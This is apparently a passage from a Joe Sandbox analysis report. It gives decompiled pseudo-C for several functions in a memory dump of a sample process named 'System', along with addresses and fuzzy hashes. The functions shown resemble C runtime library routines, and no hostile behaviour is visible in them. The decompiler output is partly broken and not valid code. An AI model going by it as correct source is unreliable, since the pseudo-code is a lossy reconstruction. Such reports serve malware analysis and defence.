                                                                                                                                                              0x7ff6e4c48fef
                                                                                                                                                              0x7ff6e4c48ffa
                                                                                                                                                              0x7ff6e4c4900c
                                                                                                                                                              0x7ff6e4c49015
                                                                                                                                                              0x7ff6e4c49021
                                                                                                                                                              0x7ff6e4c49026
                                                                                                                                                              0x7ff6e4c4902d
                                                                                                                                                              0x7ff6e4c49036
                                                                                                                                                              0x7ff6e4c4903f
                                                                                                                                                              0x7ff6e4c49048
                                                                                                                                                              0x7ff6e4c49054
                                                                                                                                                              0x7ff6e4c49057
                                                                                                                                                              0x7ff6e4c49059
                                                                                                                                                              0x7ff6e4c4905e
                                                                                                                                                              0x7ff6e4c4906c
                                                                                                                                                              0x7ff6e4c49073
                                                                                                                                                              0x7ff6e4c4907f
                                                                                                                                                              0x7ff6e4c49086
                                                                                                                                                              0x7ff6e4c49093
                                                                                                                                                              0x7ff6e4c49098
                                                                                                                                                              0x7ff6e4c4909b
                                                                                                                                                              0x7ff6e4c490a6
                                                                                                                                                              0x7ff6e4c490b2
                                                                                                                                                              0x7ff6e4c490ba
                                                                                                                                                              0x7ff6e4c490c5
                                                                                                                                                              0x7ff6e4c490cd
                                                                                                                                                              0x7ff6e4c490d4
                                                                                                                                                              0x7ff6e4c490e4
                                                                                                                                                              0x7ff6e4c490ea
                                                                                                                                                              0x7ff6e4c490f0
                                                                                                                                                              0x7ff6e4c490f7
                                                                                                                                                              0x7ff6e4c490fe
                                                                                                                                                              0x7ff6e4c49106
                                                                                                                                                              0x7ff6e4c4910c
                                                                                                                                                              0x7ff6e4c49112
                                                                                                                                                              0x7ff6e4c49121
                                                                                                                                                              0x7ff6e4c49134
                                                                                                                                                              0x7ff6e4c49149
                                                                                                                                                              0x7ff6e4c4914b
                                                                                                                                                              0x7ff6e4c49172

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: 4c5793954a133a603f6bb3c812e3f93259fcef01a0f9493924384aa5fbbfb509
                                                                                                                                                              • Instruction ID: 564b9a3442ca8baf0ac02cbd5b1f8af4adcb7d1e3f3214ebe0e8f5821a50a848
                                                                                                                                                              • Opcode Fuzzy Hash: 4c5793954a133a603f6bb3c812e3f93259fcef01a0f9493924384aa5fbbfb509
                                                                                                                                                              • Instruction Fuzzy Hash: 38A1692BB14A5289EB108FB9C5803AC37B1FB48BA4F545632DE1D93B89CF39D495C316
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C47BB0 Relevance: 1.7, APIs: 1, Instructions: 215COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF67FF6E4C47BB0(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long _a16, long long _a24) {
				void* _v8;
				signed int _v16;
				long long _v24;
				long long _v32;
				char _v48;
				char _v54;
				char _v56;
				char _v64;
				char _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				char _t92;
				void* _t93;
				void* _t96;
				void* _t99;
				long long _t104;
				intOrPtr _t113;
				signed long long _t127;
				signed long long* _t134;
				void* _t138;
				intOrPtr _t139;
				void* _t143;
				void* _t145;
				void* _t156;
				void* _t157;
				signed long long _t163;
				long long _t164;
				long long _t166;
				void* _t174;
				intOrPtr _t183;
				signed long long* _t184;
				intOrPtr _t193;
				void* _t197;
				void* _t200;
				long long* _t203;
				void* _t205;
				long long _t206;
				signed long long _t209;
				void* _t211;
				void* _t217;
				void* _t218;

				_a16 = __rbx;
				_a24 = __rdi;
				_t127 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_v16 = _t127 ^ _t200 - 0x00000080;
				_t197 = __rcx;
				_t183 =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38))));
				if (_t183 == 0) goto 0xe4c47c0f;
				_t203 =  *((intOrPtr*)(__rcx + 0x50));
				_t209 =  *_t203;
				if (_t183 - _t183 + _t209 * 2 >= 0) goto 0xe4c47c0f;
				 *_t203 = _t209 - 1;
				_t184 =  *((intOrPtr*)(__rcx + 0x38));
				_t163 =  *_t184 + 2;
				 *_t184 = _t163;
				goto 0xe4c47e34;
				_t104 =  *((long long*)(__rcx + 0x80));
				if (_t104 != 0) goto 0xe4c47c23;
				 *((intOrPtr*)(__rbx + 0x47 + _t163 * 4)) =  *((intOrPtr*)(__rbx + 0x47 + _t163 * 4)) + _t99;
				asm("sbb [eax-0x73], cl");
				if (_t104 < 0) goto 0xe4c47c75;
				if ( *0xffff != 0xffff) goto 0xe4c47c54;
				_t164 =  *((intOrPtr*)(__rcx + 0x88));
				 *_t203 = _t164;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x38)))) = _t164;
				_t134 =  *((intOrPtr*)(__rcx + 0x50));
				 *_t134 =  *((intOrPtr*)(__rcx + 0x90)) - _t164 >> 1;
				if ( *((long long*)(__rcx + 0x68)) != 0) goto 0xe4c47c7d;
				_t92 = E00007FF67FF6E4C69534(_t134, __rbx,  *((intOrPtr*)(__rcx + 0x80)));
				asm("fsubr st0, st1");
				spl = 1;
				 *_t134 =  *_t134 + _t92;
				_v48 = 0;
				_v32 = 0;
				_v24 = 0xf;
				_v48 = _t92;
				_t93 = E00007FF67FF6E4C69288(0, 0xffff,  *((intOrPtr*)(__rcx + 0x80))); // executed
				r8d = _t93;
				if (0 == 0xffffffff) goto 0xe4c47df5;
				_t166 = _v32;
				if (_t166 - _v24 >= 0) goto 0xe4c47cd0;
				_v32 = _t166 + 1;
				_t138 =  >=  ? _v48 :  &_v48;
				 *(_t138 + _t166) = r8b;
				 *((char*)(_t138 + _t166 + 1)) = 0;
				goto 0xe4c47ce4;
				r9d = r8b & 0xffffffff;
				r8d = 0;
				E00007FF67FF6E4C4C910( &_v48, _v24, __rcx, _t217, _t218);
				_t190 =  >=  ? _v48 :  &_v48;
				_t211 = _v32 + ( >=  ? _v48 :  &_v48);
				_t205 =  >=  ? _v48 :  &_v48;
				_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x68))));
				_v80 =  &_v64;
				_v88 =  &_v54;
				_v96 =  &_v56;
				_v104 =  &_v72;
				 *((intOrPtr*)(_t139 + 0x30))();
				_t113 = _t139;
				if (_t113 == 0) goto 0xe4c47d45;
				if (_t113 != 0) goto 0xe4c47d9c;
				if (_v64 !=  &_v56) goto 0xe4c47db4;
				_t143 =  >=  ? _v48 :  &_v48;
				_t206 = _v32;
				_t214 =  <  ? _t206 : _v72 - _t143;
				_t174 =  >=  ? _v48 :  &_v48;
				_t207 = _t206 - ( <  ? _t206 : _v72 - _t143);
				_v32 = _t206 - ( <  ? _t206 : _v72 - _t143);
				E00007FF67FF6E4C64380();
				goto 0xe4c47c92;
				if (_t143 != 2) goto 0xe4c47df5;
				_t145 =  >=  ? _v48 :  &_v48;
				goto 0xe4c47dfa;
				_t146 =  >=  ? _v48 : _t145;
				_t156 = _v32 - _v72 + ( >=  ? _v48 : _t145);
				if (_t156 <= 0) goto 0xe4c47def;
				_t157 = _t156 - 1;
				_t193 =  *((intOrPtr*)(_t197 + 0x80));
				_t96 = E00007FF67FF6E4C69DC4(_t99,  >=  ? _v48 : _t145, _t157, _t193);
				if (_t157 <= 0) goto 0xe4c47def;
				goto 0xe4c47dd1;
				goto 0xe4c47dfa;
				if (_t193 - 0x10 < 0) goto 0xe4c47e31;
				if (_t193 + 1 - 0x1000 < 0) goto 0xe4c47e2c;
				if (_v48 -  *((intOrPtr*)(_v48 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c47e55;
				0xe4c623d0();
				return E00007FF67FF6E4C623B0(_t96, _t99, _v16 ^ _t200 - 0x00000080);
			}














































                                                                                                                                                              0x7ff6e4c47bb0
                                                                                                                                                              0x7ff6e4c47bb5
                                                                                                                                                              0x7ff6e4c47bc5
                                                                                                                                                              0x7ff6e4c47bcf
                                                                                                                                                              0x7ff6e4c47bd3
                                                                                                                                                              0x7ff6e4c47bda
                                                                                                                                                              0x7ff6e4c47be0
                                                                                                                                                              0x7ff6e4c47be2
                                                                                                                                                              0x7ff6e4c47be6
                                                                                                                                                              0x7ff6e4c47bf0
                                                                                                                                                              0x7ff6e4c47bf6
                                                                                                                                                              0x7ff6e4c47bf9
                                                                                                                                                              0x7ff6e4c47c00
                                                                                                                                                              0x7ff6e4c47c04
                                                                                                                                                              0x7ff6e4c47c0a
                                                                                                                                                              0x7ff6e4c47c0f
                                                                                                                                                              0x7ff6e4c47c17
                                                                                                                                                              0x7ff6e4c47c22
                                                                                                                                                              0x7ff6e4c47c26
                                                                                                                                                              0x7ff6e4c47c29
                                                                                                                                                              0x7ff6e4c47c2e
                                                                                                                                                              0x7ff6e4c47c37
                                                                                                                                                              0x7ff6e4c47c3e
                                                                                                                                                              0x7ff6e4c47c45
                                                                                                                                                              0x7ff6e4c47c4e
                                                                                                                                                              0x7ff6e4c47c52
                                                                                                                                                              0x7ff6e4c47c60
                                                                                                                                                              0x7ff6e4c47c62
                                                                                                                                                              0x7ff6e4c47c77
                                                                                                                                                              0x7ff6e4c47c79
                                                                                                                                                              0x7ff6e4c47c7b
                                                                                                                                                              0x7ff6e4c47c7f
                                                                                                                                                              0x7ff6e4c47c83
                                                                                                                                                              0x7ff6e4c47c87
                                                                                                                                                              0x7ff6e4c47c8f
                                                                                                                                                              0x7ff6e4c47c92
                                                                                                                                                              0x7ff6e4c47c9a
                                                                                                                                                              0x7ff6e4c47c9d
                                                                                                                                                              0x7ff6e4c47ca3
                                                                                                                                                              0x7ff6e4c47cae
                                                                                                                                                              0x7ff6e4c47cb4
                                                                                                                                                              0x7ff6e4c47cc0
                                                                                                                                                              0x7ff6e4c47cc5
                                                                                                                                                              0x7ff6e4c47cc9
                                                                                                                                                              0x7ff6e4c47cce
                                                                                                                                                              0x7ff6e4c47cd0
                                                                                                                                                              0x7ff6e4c47cd4
                                                                                                                                                              0x7ff6e4c47cdf
                                                                                                                                                              0x7ff6e4c47cf1
                                                                                                                                                              0x7ff6e4c47cfa
                                                                                                                                                              0x7ff6e4c47d06
                                                                                                                                                              0x7ff6e4c47d0b
                                                                                                                                                              0x7ff6e4c47d12
                                                                                                                                                              0x7ff6e4c47d1b
                                                                                                                                                              0x7ff6e4c47d24
                                                                                                                                                              0x7ff6e4c47d2d
                                                                                                                                                              0x7ff6e4c47d39
                                                                                                                                                              0x7ff6e4c47d3c
                                                                                                                                                              0x7ff6e4c47d3e
                                                                                                                                                              0x7ff6e4c47d43
                                                                                                                                                              0x7ff6e4c47d51
                                                                                                                                                              0x7ff6e4c47d58
                                                                                                                                                              0x7ff6e4c47d64
                                                                                                                                                              0x7ff6e4c47d6b
                                                                                                                                                              0x7ff6e4c47d78
                                                                                                                                                              0x7ff6e4c47d7d
                                                                                                                                                              0x7ff6e4c47d80
                                                                                                                                                              0x7ff6e4c47d8b
                                                                                                                                                              0x7ff6e4c47d97
                                                                                                                                                              0x7ff6e4c47d9f
                                                                                                                                                              0x7ff6e4c47daa
                                                                                                                                                              0x7ff6e4c47db2
                                                                                                                                                              0x7ff6e4c47db9
                                                                                                                                                              0x7ff6e4c47dc9
                                                                                                                                                              0x7ff6e4c47dcf
                                                                                                                                                              0x7ff6e4c47dd1
                                                                                                                                                              0x7ff6e4c47dd8
                                                                                                                                                              0x7ff6e4c47ddf
                                                                                                                                                              0x7ff6e4c47de7
                                                                                                                                                              0x7ff6e4c47ded
                                                                                                                                                              0x7ff6e4c47df3
                                                                                                                                                              0x7ff6e4c47e02
                                                                                                                                                              0x7ff6e4c47e15
                                                                                                                                                              0x7ff6e4c47e2a
                                                                                                                                                              0x7ff6e4c47e2c
                                                                                                                                                              0x7ff6e4c47e54

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3668304517-0
                                                                                                                                                              • Opcode ID: 382476f988d33dbd5d7b216b3e4c2de6650496afdbf5ce3eb10ac76b0ec64124
                                                                                                                                                              • Instruction ID: 0cdd01151dd17c9f51bd3d2e0cc241cc04314696f95d318d37f3daa88a7c1d57
                                                                                                                                                              • Opcode Fuzzy Hash: 382476f988d33dbd5d7b216b3e4c2de6650496afdbf5ce3eb10ac76b0ec64124
                                                                                                                                                              • Instruction Fuzzy Hash: 43916527B15A4288EB10CBB9C1802BC37B1FB48B94F945533DE4E93A88DF3AD596C345
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C772A0 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 67%
                                                                                                                                                              			E00007FF67FF6E4C772A0(void* __ecx, void* __esi, long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdi, signed int __rsi, long long _a8, long long _a16, long long _a24) {
				signed char _t46;
				signed char _t49;
				signed char _t55;
				void* _t56;
				void* _t57;
				void* _t58;
				signed long long _t81;
				intOrPtr _t82;
				intOrPtr* _t113;
				signed long long _t116;
				void* _t123;

				_t57 = __ecx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t113 = __rcx;
				if (__rcx != 0) goto 0xe4c772d2;
				E00007FF67FF6E4C6C854(__rax);
				 *__rax = 0x16;
				_t46 = E00007FF67FF6E4C6A5D8();
				goto 0xe4c773ef;
				if ((_t46 & 0x00000001) == 0) goto 0xe4c773ef;
				if ((_t46 & 0x00000001) != 0) goto 0xe4c773ef;
				if ((_t46 & 0x00000001) == 0) goto 0xe4c77301;
				asm("lock or dword [ecx+0x14], 0x10");
				goto 0xe4c773ef;
				asm("lock or dword [ecx+0x14], 0x1");
				_t81 =  *((intOrPtr*)(__rcx + 0x14));
				if ((_t81 & 0x000004c0) != 0) goto 0xe4c77315;
				E00007FF67FF6E4C77094(_t81, __rbx, __rcx);
				 *((long long*)(__rcx)) =  *((intOrPtr*)(__rcx + 8));
				E00007FF67FF6E4C74FCC(_t81, __rcx);
				r8d =  *((intOrPtr*)(__rcx + 0x20));
				_t49 = E00007FF67FF6E4C788F0(_t56, _t57, _t58,  *((intOrPtr*)(__rcx + 8)),  *((intOrPtr*)(__rcx + 8)), __rcx, _t123); // executed
				 *(_t113 + 0x10) = _t81;
				_t19 = _t81 + 1; // 0x1
				if (_t19 - 1 <= 0) goto 0xe4c773dd;
				_t82 =  *((intOrPtr*)(_t113 + 0x14));
				_t116 = __rsi | 0xffffffff;
				if ((_t49 & 0x00000006) != 0) goto 0xe4c773a8;
				E00007FF67FF6E4C74FCC(_t82, _t113);
				if (_t82 == _t116) goto 0xe4c77393;
				E00007FF67FF6E4C74FCC(_t82, _t113);
				if (_t82 == 0xfffffffe) goto 0xe4c77393;
				E00007FF67FF6E4C74FCC(_t82, _t113);
				E00007FF67FF6E4C74FCC(_t82, _t113);
				goto 0xe4c7739a;
				_t55 =  *0x7FF6E4CA9308 & 0x00000082;
				if (_t55 != 0x82) goto 0xe4c773a8;
				asm("lock or dword [edi+0x14], 0x20");
				if ( *((long long*)(_t113 + 0x20)) != 0x200) goto 0xe4c773cc;
				if ((_t55 & 0x00000001) == 0) goto 0xe4c773cc;
				if ((_t55 & 0x00000001) != 0) goto 0xe4c773cc;
				 *((long long*)(_t113 + 0x20)) = 0x1000;
				 *(_t113 + 0x10) =  *(_t113 + 0x10) + _t116;
				 *_t113 =  *_t113 + 1;
				goto 0xe4c773f2;
				asm("sbb eax, eax");
				asm("lock or [edi+0x14], eax");
				 *(_t113 + 0x10) =  *(_t113 + 0x10) & 0x00000000;
				return _t55;
			}














                                                                                                                                                              0x7ff6e4c772a0
                                                                                                                                                              0x7ff6e4c772a0
                                                                                                                                                              0x7ff6e4c772a5
                                                                                                                                                              0x7ff6e4c772aa
                                                                                                                                                              0x7ff6e4c772b5
                                                                                                                                                              0x7ff6e4c772bb
                                                                                                                                                              0x7ff6e4c772bd
                                                                                                                                                              0x7ff6e4c772c2
                                                                                                                                                              0x7ff6e4c772c8
                                                                                                                                                              0x7ff6e4c772cd
                                                                                                                                                              0x7ff6e4c772da
                                                                                                                                                              0x7ff6e4c772e8
                                                                                                                                                              0x7ff6e4c772f5
                                                                                                                                                              0x7ff6e4c772f7
                                                                                                                                                              0x7ff6e4c772fc
                                                                                                                                                              0x7ff6e4c77301
                                                                                                                                                              0x7ff6e4c77306
                                                                                                                                                              0x7ff6e4c7730e
                                                                                                                                                              0x7ff6e4c77310
                                                                                                                                                              0x7ff6e4c7731c
                                                                                                                                                              0x7ff6e4c7731f
                                                                                                                                                              0x7ff6e4c77324
                                                                                                                                                              0x7ff6e4c7732d
                                                                                                                                                              0x7ff6e4c77332
                                                                                                                                                              0x7ff6e4c77335
                                                                                                                                                              0x7ff6e4c7733b
                                                                                                                                                              0x7ff6e4c77341
                                                                                                                                                              0x7ff6e4c77344
                                                                                                                                                              0x7ff6e4c77349
                                                                                                                                                              0x7ff6e4c7734e
                                                                                                                                                              0x7ff6e4c77355
                                                                                                                                                              0x7ff6e4c7735a
                                                                                                                                                              0x7ff6e4c77362
                                                                                                                                                              0x7ff6e4c77367
                                                                                                                                                              0x7ff6e4c7737d
                                                                                                                                                              0x7ff6e4c77391
                                                                                                                                                              0x7ff6e4c7739d
                                                                                                                                                              0x7ff6e4c773a1
                                                                                                                                                              0x7ff6e4c773a3
                                                                                                                                                              0x7ff6e4c773af
                                                                                                                                                              0x7ff6e4c773b9
                                                                                                                                                              0x7ff6e4c773c3
                                                                                                                                                              0x7ff6e4c773c5
                                                                                                                                                              0x7ff6e4c773cc
                                                                                                                                                              0x7ff6e4c773d8
                                                                                                                                                              0x7ff6e4c773db
                                                                                                                                                              0x7ff6e4c773df
                                                                                                                                                              0x7ff6e4c773e7
                                                                                                                                                              0x7ff6e4c773eb
                                                                                                                                                              0x7ff6e4c77409

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: ce083e79ecf88197a998a97d8e683864580dc503782226a40ba212a36745c3d7
                                                                                                                                                              • Instruction ID: e3b946ebdb20d38180629c4a412d6cf5e09275424acf2ca37129616d4b3b112d
                                                                                                                                                              • Opcode Fuzzy Hash: ce083e79ecf88197a998a97d8e683864580dc503782226a40ba212a36745c3d7
                                                                                                                                                              • Instruction Fuzzy Hash: 4D41B137A5D64B83EA549A39968437C37B0EB44B94F001632DB49C76D0CF6AF4A2C74A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C788F0 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00007FF67FF6E4C788F0(void* __ebx, signed int __ecx, void* __edi, signed int __rbx, void* __rdx, signed long long __rdi, signed long long __r12, void* _a16, void* _a24, void* _a32) {
				void* _t39;
				signed long long* _t44;
				signed long long* _t47;
				signed long long* _t49;
				signed long long* _t50;
				signed long long _t56;
				signed long long* _t66;
				void* _t69;
				signed long long _t74;
				void* _t76;
				void* _t78;
				signed long long _t80;

				_t44 = _t66;
				_t44[2] = __rbx;
				_t44[3] = __rdi;
				_t44[4] = __r12;
				_t44[1] = _t56;
				r14d = r8d;
				_t64 = __ecx;
				if (__ecx != 0xfffffffe) goto 0xe4c78932;
				E00007FF67FF6E4C6C834(_t44);
				 *_t44 =  *_t44 & 0x00000000;
				E00007FF67FF6E4C6C854(_t44);
				 *_t44 = 9;
				goto 0xe4c789ec;
				if (_t56 < 0) goto 0xe4c789d4;
				_t39 = _t64 -  *0xe4cabb00; // 0x40
				if (_t39 >= 0) goto 0xe4c789d4;
				_t80 = __ecx >> 6;
				_t74 = (__ecx & 0x0000003f) + (__ecx & 0x0000003f) * 8;
				_t47 = 0xe4cab700[_t80];
				if (( *(_t47 + 0x38 + _t74 * 8) & 0x00000001) == 0) goto 0xe4c789d4;
				if (r14d - 0x7fffffff <= 0) goto 0xe4c78988;
				E00007FF67FF6E4C6C834(_t47);
				 *_t47 =  *_t47 & 0x00000000;
				E00007FF67FF6E4C6C854(_t47);
				 *_t47 = 0x16;
				goto 0xe4c789e7;
				E00007FF67FF6E4C7AB1C();
				_t49 = 0xe4cab700[_t80];
				if (( *(0xe4cab700 + 0x38 + _t74 * 8) & 0x00000001) != 0) goto 0xe4c789ba;
				E00007FF67FF6E4C6C854(_t49);
				 *0xe4cab700 = 9;
				E00007FF67FF6E4C6C834(_t49);
				 *0xe4cab700 =  *0xe4cab700 & 0x00000000;
				goto 0xe4c789c9;
				r8d = r14d;
				E00007FF67FF6E4C78A0C(__ebx, __ecx, _t49, __rbx | 0xffffffff, __rdx, _t69, _t78, _t76); // executed
				E00007FF67FF6E4C7AC04();
				_t50 = _t49;
				goto 0xe4c789ef;
				E00007FF67FF6E4C6C834(_t50);
				 *_t50 =  *_t50 & 0x00000000;
				E00007FF67FF6E4C6C854(_t50);
				 *_t50 = 9;
				return E00007FF67FF6E4C6A5D8();
			}















                                                                                                                                                              0x7ff6e4c788f0
                                                                                                                                                              0x7ff6e4c788f3
                                                                                                                                                              0x7ff6e4c788f7
                                                                                                                                                              0x7ff6e4c788fb
                                                                                                                                                              0x7ff6e4c788ff
                                                                                                                                                              0x7ff6e4c7890c
                                                                                                                                                              0x7ff6e4c78912
                                                                                                                                                              0x7ff6e4c78918
                                                                                                                                                              0x7ff6e4c7891a
                                                                                                                                                              0x7ff6e4c7891f
                                                                                                                                                              0x7ff6e4c78922
                                                                                                                                                              0x7ff6e4c78927
                                                                                                                                                              0x7ff6e4c7892d
                                                                                                                                                              0x7ff6e4c78934
                                                                                                                                                              0x7ff6e4c7893a
                                                                                                                                                              0x7ff6e4c78940
                                                                                                                                                              0x7ff6e4c7894c
                                                                                                                                                              0x7ff6e4c7895a
                                                                                                                                                              0x7ff6e4c7895e
                                                                                                                                                              0x7ff6e4c78968
                                                                                                                                                              0x7ff6e4c78971
                                                                                                                                                              0x7ff6e4c78973
                                                                                                                                                              0x7ff6e4c78978
                                                                                                                                                              0x7ff6e4c7897b
                                                                                                                                                              0x7ff6e4c78980
                                                                                                                                                              0x7ff6e4c78986
                                                                                                                                                              0x7ff6e4c7898a
                                                                                                                                                              0x7ff6e4c78999
                                                                                                                                                              0x7ff6e4c789a3
                                                                                                                                                              0x7ff6e4c789a5
                                                                                                                                                              0x7ff6e4c789aa
                                                                                                                                                              0x7ff6e4c789b0
                                                                                                                                                              0x7ff6e4c789b5
                                                                                                                                                              0x7ff6e4c789b8
                                                                                                                                                              0x7ff6e4c789ba
                                                                                                                                                              0x7ff6e4c789c2
                                                                                                                                                              0x7ff6e4c789cb
                                                                                                                                                              0x7ff6e4c789d0
                                                                                                                                                              0x7ff6e4c789d2
                                                                                                                                                              0x7ff6e4c789d4
                                                                                                                                                              0x7ff6e4c789d9
                                                                                                                                                              0x7ff6e4c789dc
                                                                                                                                                              0x7ff6e4c789e1
                                                                                                                                                              0x7ff6e4c78a08

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: b79a8663bd318cae38259f11cb5ddf4d0f184025f721f87a4480240d22a0a1df
                                                                                                                                                              • Instruction ID: 3a9da5b2537608a93818e0f8f25c2025ed3a584113431c6ce7a158fe7c1789ab
                                                                                                                                                              • Opcode Fuzzy Hash: b79a8663bd318cae38259f11cb5ddf4d0f184025f721f87a4480240d22a0a1df
                                                                                                                                                              • Instruction Fuzzy Hash: 59319C2BE5C64382E7519B7588C53782A70AB84FA5F414177DB2D833D2DEBEA441832B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C838BC Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E00007FF67FF6E4C838BC(void* __rax, long long __rbx, long long _a8, intOrPtr _a40) {
				void* _t4;

				_a8 = __rbx;
				if (_a40 != 0) goto 0xe4c838f1;
				_t4 = E00007FF67FF6E4C6C854(__rax);
				asm("insb");
				asm("invalid");
				return _t4;
			}




                                                                                                                                                              0x7ff6e4c838bc
                                                                                                                                                              0x7ff6e4c838d1
                                                                                                                                                              0x7ff6e4c838d3
                                                                                                                                                              0x7ff6e4c838e1
                                                                                                                                                              0x7ff6e4c838e2
                                                                                                                                                              0x7ff6e4c838f0

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                              • Opcode ID: 94cfdba95cb9f1173952f890fba6cf35439c0c9803fb76d0777186a914c53558
